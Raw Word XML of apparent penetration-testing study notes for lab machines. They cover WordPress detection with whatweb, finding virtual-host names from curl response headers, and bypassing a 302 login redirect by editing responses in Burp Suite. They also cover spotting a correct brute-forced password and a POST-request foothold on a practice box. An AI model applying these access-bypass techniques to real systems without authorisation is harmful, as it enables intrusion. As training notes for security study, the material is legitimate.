    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000369">
      <w:pPr>
        <w:ind w:left="-1350" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7592028" cy="2384394"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="403" name="image391.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image391.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="16826" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7592028" cy="23843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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, the "length" and "status code" were different for password "admin" which was the correct one</w:t>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_497vrd545obz" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if a site is wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="309" name="image362.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image362.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you look at source code and see stuff like wp-content or anything with "wp-…", then it's likely wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can use tools like whatweb:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000370">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1460"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb http://192.168.50.244</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="301" name="image287.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image287.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1460"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from 27.1.2. WEBSRV1</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g8ymg922qp7j" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse User Agents</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://explore.whatismybrowser.com/useragents/parse/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to parse user agents and help us understand more about it</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ympcsguhzxfw" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Requests</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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Who sent it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the referrer and user-agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Who received it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the host</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ugv2zgxoj5ne" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Pages (how to find domain names)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes when we visit a website, we are met with some default Ubuntu, Apache or default centOS webpage. There is no content. That usually means there is some virtual hosting, and we have to find the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000380">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000381">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try adding the IP and the box's name. Like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">twomillion.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(just an example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000382">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try curling the webpage and get the HTTP Response Headers. Then, look at the "X-Backend-Server" header, and see if it displays any domain names. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000383">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000384">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This worked in the Paper HTB, where it displayed: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000385">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Backend-Server: office.paper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000386">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000387">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5b0a72mxcyne" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass/Avoid Redirection using Burpsuite</w:t>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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had a login.php page and also a command.php page. But, when we tried viewing the command.php page, we were redirected to this login.php (with status code 302). </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t xml:space="preserve">This makes the status code 302 websites really useful, since we can avoid being re-directed</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So, to avoid redirection, we can intercept on Burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the top line change it from "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">302 Found</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</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8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the line "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: /login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and delete it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000390">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This Location header is what does the redirection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000391">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then send this request back to browser </w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4s0mt52z5h54" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interesting web attack vector with changing request type, and adding headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000395">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000396">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nickel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice (which is actually a windows machine), had a really interesting web attack vector in order to get foothold.</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They first ran into an APIPA (Automatic Private IP Address) 169.254.59.27. The Internet Assigned Numbers Authority (IANA) has reserved the IP address range from 169.254.0.1 to 169.254.255.254 specifically for APIPA.</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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="984"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then saw it was trying to access port 33333, so they tried accessing that, and the got a response "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;p&gt;Cannot "GET" /list-current-deployments&lt;/p&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is a hint that maybe GET is not right, and maybe POST is write. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="984"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, they added the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-X POST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="984"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they got the error message "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;hr&gt;&lt;p&gt;HTTP Error 411. The request must be chunked or have a content length. &lt;/p&gt;&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This hints that we have to add a content-length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, they added </w:t>
      </w:r>
